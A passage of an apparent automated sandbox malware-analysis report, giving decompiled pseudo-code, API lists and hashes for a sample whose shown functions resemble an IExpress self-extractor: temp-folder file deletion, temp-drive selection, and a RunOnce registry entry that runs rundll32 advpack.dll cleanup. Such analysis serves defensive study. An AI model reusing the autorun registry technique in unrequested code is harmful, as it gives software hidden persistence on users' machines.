                                                                                                                                                                                                        								E000C16B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                        								_t58 = 0x104;
                                                                                                                                                                                                        								E000C658A( &_v280, 0x104, 0xc1140);
                                                                                                                                                                                                        								E000C2390( &_v284);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                        					} while (_t36 != 0);
                                                                                                                                                                                                        					FindClose(_t63); // executed
                                                                                                                                                                                                        					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                        					goto L10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}






















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindFirstFileA.KERNELBASE(?,000C8A3A,000C11F4,000C8A3A,00000000,?,?), ref: 000C23F6
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(?,000C11F8), ref: 000C2427
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(?,000C11FC), ref: 000C243B
                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 000C2495
                                                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 000C24A3
                                                                                                                                                                                                        • FindNextFileA.KERNELBASE(00000000,00000010), ref: 000C24AF
                                                                                                                                                                                                        • FindClose.KERNELBASE(00000000), ref: 000C24BE
                                                                                                                                                                                                        • RemoveDirectoryA.KERNELBASE(000C8A3A), ref: 000C24C5
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 836429354-0
                                                                                                                                                                                                        • Opcode ID: 9adf8deb1d28a7978107eac7b852d84bf0d33eb3d08aa4ee08857601080d9a2d
                                                                                                                                                                                                        • Instruction ID: 4da26651c4ca0c8a9a7b1fdefd3fa6d665700a06e37c2c94a78066075969a5a5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9adf8deb1d28a7978107eac7b852d84bf0d33eb3d08aa4ee08857601080d9a2d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7831A1327047449BD320EBA4CC89FEF73ECABC6345F14492DB99586292EB389909C752
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 70%
                                                                                                                                                                                                        			E000C2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                        				long _t4;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				intOrPtr _t7;
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				struct HINSTANCE__* _t12;
                                                                                                                                                                                                        				intOrPtr* _t17;
                                                                                                                                                                                                        				signed char _t19;
                                                                                                                                                                                                        				intOrPtr* _t21;
                                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                                        				void* _t24;
                                                                                                                                                                                                        				intOrPtr _t32;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t4 = GetVersion();
                                                                                                                                                                                                        				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                        					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                        					if(_t12 != 0) {
                                                                                                                                                                                                        						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                        						if(_t21 != 0) {
                                                                                                                                                                                                        							_t17 = _t21;
                                                                                                                                                                                                        							 *0xca288(0, 1, 0, 0);
                                                                                                                                                                                                        							 *_t21();
                                                                                                                                                                                                        							_t29 = _t24 - _t24;
                                                                                                                                                                                                        							if(_t24 != _t24) {
                                                                                                                                                                                                        								_t17 = 4;
                                                                                                                                                                                                        								asm("int 0x29");
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t20 = _a12;
                                                                                                                                                                                                        				_t18 = _a4;
                                                                                                                                                                                                        				 *0xc9124 = 0;
                                                                                                                                                                                                        				if(E000C2CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                        					_t9 = E000C2F1D(_t18, _t20); // executed
                                                                                                                                                                                                        					_t22 = _t9; // executed
                                                                                                                                                                                                        					E000C52B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                        					if(_t22 != 0) {
                                                                                                                                                                                                        						_t32 =  *0xc8a3a; // 0x0
                                                                                                                                                                                                        						if(_t32 == 0) {
                                                                                                                                                                                                        							_t19 =  *0xc9a2c; // 0x0
                                                                                                                                                                                                        							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                        								E000C1F90(_t19, _t21, _t22);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t6 =  *0xc8588; // 0x0
                                                                                                                                                                                                        				if(_t6 != 0) {
                                                                                                                                                                                                        					CloseHandle(_t6);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t7 =  *0xc9124; // 0x80070002
                                                                                                                                                                                                        				return _t7;
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersion.KERNEL32(?,00000002,00000000,?,000C6BB0,000C0000,00000000,00000002,0000000A), ref: 000C2C03
                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(Kernel32.dll,?,000C6BB0,000C0000,00000000,00000002,0000000A), ref: 000C2C18
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 000C2C28
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,000C6BB0,000C0000,00000000,00000002,0000000A), ref: 000C2C98
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                        • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                        • API String ID: 62482547-3460614246
                                                                                                                                                                                                        • Opcode ID: 6fe65bfb5bde4ea31a203f59ecd1cd7788933d8e61ec52d7a595a2c6fb76c0f3
                                                                                                                                                                                                        • Instruction ID: b4e0b83eb89723717a3bc65aa6bb07d04adc5ae5bd4757ccf8fbcd5f448bb8d5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6fe65bfb5bde4ea31a203f59ecd1cd7788933d8e61ec52d7a595a2c6fb76c0f3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1411E571300709ABE7206BB5ACCDFAF3799AB85394B08002DF905D7692DE39EC418665
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E000C6F40() {
                                                                                                                                                                                                        
                                                                                                                                                                                                        				SetUnhandledExceptionFilter(E000C6EF0); // executed
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}



                                                                                                                                                                                                        0x000c6f45
                                                                                                                                                                                                        0x000c6f4d

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 000C6F45
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                                                        • Opcode ID: e1167a52f338bbca0dea86b073e14fc502a9030ccb45c52b60a0f4a276ee586d
                                                                                                                                                                                                        • Instruction ID: 500c040d352c9a0020f382bb8d7691c657671b389a253cbcd30bc6026ff0477f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e1167a52f338bbca0dea86b073e14fc502a9030ccb45c52b60a0f4a276ee586d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6F90027435110447A7201BB09D19D1975915B4E606B865465A511C8494DB6540405513
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

C-Code - Quality: 93%
E000C202A(struct HINSTANCE__* __edx) {
	signed int _v8;
	char _v268;
	char _v528;
	void* _v532;
	int _v536;
	int _v540;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t28;
	long _t36;
	long _t41;
	struct HINSTANCE__* _t46;
	intOrPtr _t49;
	intOrPtr _t50;
	CHAR* _t54;
	void _t56;
	signed int _t66;
	intOrPtr* _t72;
	void* _t73;
	void* _t75;
	void* _t80;
	intOrPtr* _t81;
	void* _t86;
	void* _t87;
	void* _t90;
	_Unknown_base(*)()* _t91;
	signed int _t93;
	void* _t94;
	void* _t95;

	_t79 = __edx;
	_t28 =  *0xc8004; // 0x374600bf
	_v8 = _t28 ^ _t93;
	_t84 = 0x104;
	memset( &_v268, 0, 0x104);
	memset( &_v528, 0, 0x104);
	_t95 = _t94 + 0x18;
	_t66 = 0;
	_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
	if(_t36 != 0) {
		L24:
		return E000C6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
	}
	_push(_t86);
	_t87 = 0;
	while(1) {
		E000C171E("wextract_cleanup1", 0x50, "wextract_cleanup%d", _t87);
		_t95 = _t95 + 0x10;
		_t41 = RegQueryValueExA(_v532, "wextract_cleanup1", 0, 0, 0,  &_v540); // executed
		if(_t41 != 0) {
			break;
		}
		_t87 = _t87 + 1;
		if(_t87 < 0xc8) {
			continue;
		}
		break;
	}
	if(_t87 != 0xc8) {
		GetSystemDirectoryA( &_v528, _t84);
		_t79 = _t84;
		E000C658A( &_v528, _t84, "advpack.dll");
		_t46 = LoadLibraryA( &_v528); // executed
		_t84 = _t46;
		if(_t84 == 0) {
			L10:
			if(GetModuleFileNameA( *0xc9a3c,  &_v268, 0x104) == 0) {
				L17:
				_t36 = RegCloseKey(_v532);
				L23:
				_pop(_t86);
				goto L24;
			}
			L11:
			_t72 =  &_v268;
			_t80 = _t72 + 1;
			do {
				_t49 =  *_t72;
				_t72 = _t72 + 1;
			} while (_t49 != 0);
			_t73 = _t72 - _t80;
			_t81 = 0xc91e4;
			do {
				_t50 =  *_t81;
				_t81 = _t81 + 1;
			} while (_t50 != 0);
			_t84 = _t73 + 0x50 + _t81 - 0xc91e5;
			_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xc91e5);
			if(_t90 != 0) {
				 *0xc8580 = _t66 ^ 0x00000001;
				_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
				if(_t66 == 0) {
					_t54 = "%s /D:%s";
				}
				_push("C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
				E000C171E(_t90, _t84, _t54,  &_v268);
				_t75 = _t90;
				_t23 = _t75 + 1; // 0x1
				_t79 = _t23;
				do {
					_t56 =  *_t75;
					_t75 = _t75 + 1;
				} while (_t56 != 0);
				_t24 = _t75 - _t79 + 1; // 0x2
				RegSetValueExA(_v532, "wextract_cleanup1", 0, 1, _t90, _t24); // executed
				RegCloseKey(_v532); // executed
				_t36 = LocalFree(_t90);
				goto L23;
			}
			_t79 = 0x4b5;
			E000C44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
			goto L17;
		}
		_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
		_t66 = 0 | _t91 != 0x00000000;
		FreeLibrary(_t84); // executed
		if(_t91 == 0) {
			goto L10;
		}
		if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
			E000C658A( &_v268, 0x104, 0xc1140);
		}
		goto L11;
	}
	_t36 = RegCloseKey(_v532);
	 *0xc8530 = _t66;
	goto L23;
}

































                                                                                                                                                                                                        0x000c2122
                                                                                                                                                                                                        0x000c2128
                                                                                                                                                                                                        0x000c212c
                                                                                                                                                                                                        0x000c2179
                                                                                                                                                                                                        0x000c2194
                                                                                                                                                                                                        0x000c21de
                                                                                                                                                                                                        0x000c21e4
                                                                                                                                                                                                        0x000c2256
                                                                                                                                                                                                        0x000c2256
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2256
                                                                                                                                                                                                        0x000c2196
                                                                                                                                                                                                        0x000c2196
                                                                                                                                                                                                        0x000c219c
                                                                                                                                                                                                        0x000c219f
                                                                                                                                                                                                        0x000c219f
                                                                                                                                                                                                        0x000c21a1
                                                                                                                                                                                                        0x000c21a2
                                                                                                                                                                                                        0x000c21a6
                                                                                                                                                                                                        0x000c21a8
                                                                                                                                                                                                        0x000c21b0
                                                                                                                                                                                                        0x000c21b0
                                                                                                                                                                                                        0x000c21b2
                                                                                                                                                                                                        0x000c21b3
                                                                                                                                                                                                        0x000c21bc
                                                                                                                                                                                                        0x000c21c7
                                                                                                                                                                                                        0x000c21cb
                                                                                                                                                                                                        0x000c21f1
                                                                                                                                                                                                        0x000c21f6
                                                                                                                                                                                                        0x000c21fd
                                                                                                                                                                                                        0x000c21ff
                                                                                                                                                                                                        0x000c21ff
                                                                                                                                                                                                        0x000c2204
                                                                                                                                                                                                        0x000c2213
                                                                                                                                                                                                        0x000c2218
                                                                                                                                                                                                        0x000c221d
                                                                                                                                                                                                        0x000c221d
                                                                                                                                                                                                        0x000c2220
                                                                                                                                                                                                        0x000c2220
                                                                                                                                                                                                        0x000c2222
                                                                                                                                                                                                        0x000c2223
                                                                                                                                                                                                        0x000c2229
                                                                                                                                                                                                        0x000c223d
                                                                                                                                                                                                        0x000c2249
                                                                                                                                                                                                        0x000c2250
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2250
                                                                                                                                                                                                        0x000c21d2
                                                                                                                                                                                                        0x000c21d9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c21d9
                                                                                                                                                                                                        0x000c213a
                                                                                                                                                                                                        0x000c2141
                                                                                                                                                                                                        0x000c2144
                                                                                                                                                                                                        0x000c214c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2163
                                                                                                                                                                                                        0x000c2172
                                                                                                                                                                                                        0x000c2172
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2163
                                                                                                                                                                                                        0x000c20ea
                                                                                                                                                                                                        0x000c20f0
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 000C2050
                                                                                                                                                                                                        • memset.MSVCRT ref: 000C205F
                                                                                                                                                                                                        • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 000C208C
                                                                                                                                                                                                          • Part of subcall function 000C171E: _vsnprintf.MSVCRT ref: 000C1750
                                                                                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000C20C9
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000C20EA
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 000C2103
                                                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000C2122
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 000C2134
                                                                                                                                                                                                        • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000C2144
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 000C215B
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000C218C
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000C21C1
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000C21E4
                                                                                                                                                                                                        • RegSetValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 000C223D
                                                                                                                                                                                                        • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000C2249
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000C2250
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                        • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup1
                                                                                                                                                                                                        • API String ID: 178549006-217856272
                                                                                                                                                                                                        • Opcode ID: 36cc67df7f1621da369932b0566b4099c36b9bd6ed15e3a45cf94e7d444ae28a
                                                                                                                                                                                                        • Instruction ID: 7d60d9713e6d677d633283fa5e3efa55d930817ce3e452e7a64df9f6d12fbc18
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 36cc67df7f1621da369932b0566b4099c36b9bd6ed15e3a45cf94e7d444ae28a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F1512371A00218ABEB209B60DC4DFEF777CEB55740F1441ACFE09E7152DA759E898B60
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 232 c55a0-c55d9 call c468f LocalAlloc 235 c55fd-c560c call c468f 232->235 236 c55db-c55f1 call c44b9 call c6285 232->236 242 c560e-c5630 call c44b9 LocalFree 235->242 243 c5632-c5643 lstrcmpA 235->243 250 c55f6-c55f8 236->250 242->250 244 c564b-c5659 LocalFree 243->244 245 c5645 243->245 248 c565b-c565d 244->248 249 c5696-c569c 244->249 245->244 252 c565f-c5667 248->252 253 c5669 248->253 255 c589f-c58b5 call c6517 249->255 256 c56a2-c56a8 249->256 254 c58b7-c58c7 call c6ce0 250->254 252->253 257 c566b-c567a call c5467 252->257 253->257 255->254 256->255 260 c56ae-c56c1 GetTempPathA 256->260 270 c589b-c589d 257->270 271 c5680-c5691 call c44b9 257->271 264 c56f3-c5711 call c1781 260->264 265 c56c3-c56c9 call c5467 260->265 275 c586c-c5890 GetWindowsDirectoryA call c597d 264->275 276 c5717-c5729 GetDriveTypeA 264->276 269 c56ce-c56d0 265->269 269->270 273 c56d6-c56df call c2630 269->273 270->254 271->250 273->264 286 c56e1-c56ed call c5467 273->286 275->264 287 c5896 275->287 280 c572b-c572e 276->280 281 c5730-c5740 GetFileAttributesA 276->281 280->281 284 c5742-c5745 280->284 281->284 285 c577e-c578f call c597d 281->285 289 c576b 284->289 290 c5747-c574f 284->290 298 c5791-c579e call c2630 285->298 299 c57b2-c57bf call c2630 285->299 286->264 286->270 287->270 292 c5771-c5779 289->292 290->292 294 c5751-c5753 290->294 297 c5864-c5866 292->297 294->292 295 c5755-c5762 call c6952 294->295 295->289 308 c5764-c5769 295->308 297->275 297->276 298->289 309 c57a0-c57b0 call c597d 298->309 306 c57c1-c57cd GetWindowsDirectoryA 299->306 307 c57d3-c57f8 call c658a GetFileAttributesA 299->307 306->307 314 c580a 307->314 315 c57fa-c5808 CreateDirectoryA 307->315 308->285 308->289 309->289 309->299 316 c580d-c580f 314->316 315->316 317 c5827-c585c SetFileAttributesA call c1781 call c5467 316->317 318 c5811-c5825 316->318 317->270 323 c585e 317->323 318->297 323->297
                                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                                        			E000C55A0(void* __eflags) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v265;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                                                        				int _t32;
                                                                                                                                                                                                        				int _t33;
                                                                                                                                                                                                        				int _t35;
                                                                                                                                                                                                        				signed int _t36;
                                                                                                                                                                                                        				signed int _t38;
                                                                                                                                                                                                        				int _t40;
                                                                                                                                                                                                        				int _t44;
                                                                                                                                                                                                        				long _t48;
                                                                                                                                                                                                        				int _t49;
                                                                                                                                                                                                        				int _t50;
                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                        				int _t54;
                                                                                                                                                                                                        				int _t59;
                                                                                                                                                                                                        				char _t60;
                                                                                                                                                                                                        				int _t65;
                                                                                                                                                                                                        				char _t66;
                                                                                                                                                                                                        				int _t67;
                                                                                                                                                                                                        				int _t68;
                                                                                                                                                                                                        				int _t69;
                                                                                                                                                                                                        				int _t70;
                                                                                                                                                                                                        				int _t71;
                                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                        				int _t73;
                                                                                                                                                                                                        				CHAR* _t82;
                                                                                                                                                                                                        				CHAR* _t88;
                                                                                                                                                                                                        				void* _t103;
                                                                                                                                                                                                        				signed int _t110;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t28 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                        				_t2 = E000C468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                        				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                        				if(_t109 != 0) {
                                                                                                                                                                                                        					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                        					_t32 = E000C468F(_t82, _t109, 1);
                                                                                                                                                                                                        					__eflags = _t32;
                                                                                                                                                                                                        					if(_t32 != 0) {
                                                                                                                                                                                                        						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                        						__eflags = _t33;
                                                                                                                                                                                                        						if(_t33 == 0) {
                                                                                                                                                                                                        							 *0xc9a30 = 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						LocalFree(_t109);
                                                                                                                                                                                                        						_t35 =  *0xc8b3e; // 0x0
                                                                                                                                                                                                        						__eflags = _t35;
                                                                                                                                                                                                        						if(_t35 == 0) {
                                                                                                                                                                                                        							__eflags =  *0xc8a24; // 0x0
                                                                                                                                                                                                        							if(__eflags != 0) {
                                                                                                                                                                                                        								L46:
                                                                                                                                                                                                        								_t101 = 0x7d2;
                                                                                                                                                                                                        								_t36 = E000C6517(_t82, 0x7d2, 0, E000C3210, 0, 0);
                                                                                                                                                                                                        								asm("sbb eax, eax");
                                                                                                                                                                                                        								_t38 =  ~( ~_t36);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								__eflags =  *0xc9a30; // 0x0
                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									goto L46;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t109 = 0xc91e4;
                                                                                                                                                                                                        									_t40 = GetTempPathA(0x104, 0xc91e4);
                                                                                                                                                                                                        									__eflags = _t40;
                                                                                                                                                                                                        									if(_t40 == 0) {
                                                                                                                                                                                                        										L19:
                                                                                                                                                                                                        										_push(_t82);
                                                                                                                                                                                                        										E000C1781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                        										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                        										if(_v268 <= 0x5a) {
                                                                                                                                                                                                        											do {
                                                                                                                                                                                                        												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                        												__eflags = _t109 - 6;
                                                                                                                                                                                                        												if(_t109 == 6) {
                                                                                                                                                                                                        													L22:
                                                                                                                                                                                                        													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                        													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                        														goto L30;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														goto L23;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													__eflags = _t109 - 3;
                                                                                                                                                                                                        													if(_t109 != 3) {
                                                                                                                                                                                                        														L23:
                                                                                                                                                                                                        														__eflags = _t109 - 2;
                                                                                                                                                                                                        														if(_t109 != 2) {
                                                                                                                                                                                                        															L28:
                                                                                                                                                                                                        															_t66 = _v268;
                                                                                                                                                                                                        															goto L29;
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															_t66 = _v268;
                                                                                                                                                                                                        															__eflags = _t66 - 0x41;
                                                                                                                                                                                                        															if(_t66 == 0x41) {
                                                                                                                                                                                                        																L29:
                                                                                                                                                                                                        																_t60 = _t66 + 1;
                                                                                                                                                                                                        																_v268 = _t60;
                                                                                                                                                                                                        																goto L42;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																__eflags = _t66 - 0x42;
                                                                                                                                                                                                        																if(_t66 == 0x42) {
                                                                                                                                                                                                        																	goto L29;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	_t68 = E000C6952( &_v268);
                                                                                                                                                                                                        																	__eflags = _t68;
                                                                                                                                                                                                        																	if(_t68 == 0) {
                                                                                                                                                                                                        																		goto L28;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                        																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                        																			L30:
                                                                                                                                                                                                        																			_push(0);
                                                                                                                                                                                                        																			_t103 = 3;
                                                                                                                                                                                                        																			_t49 = E000C597D( &_v268, _t103, 1);
                                                                                                                                                                                                        																			__eflags = _t49;
                                                                                                                                                                                                        																			if(_t49 != 0) {
                                                                                                                                                                                                        																				L33:
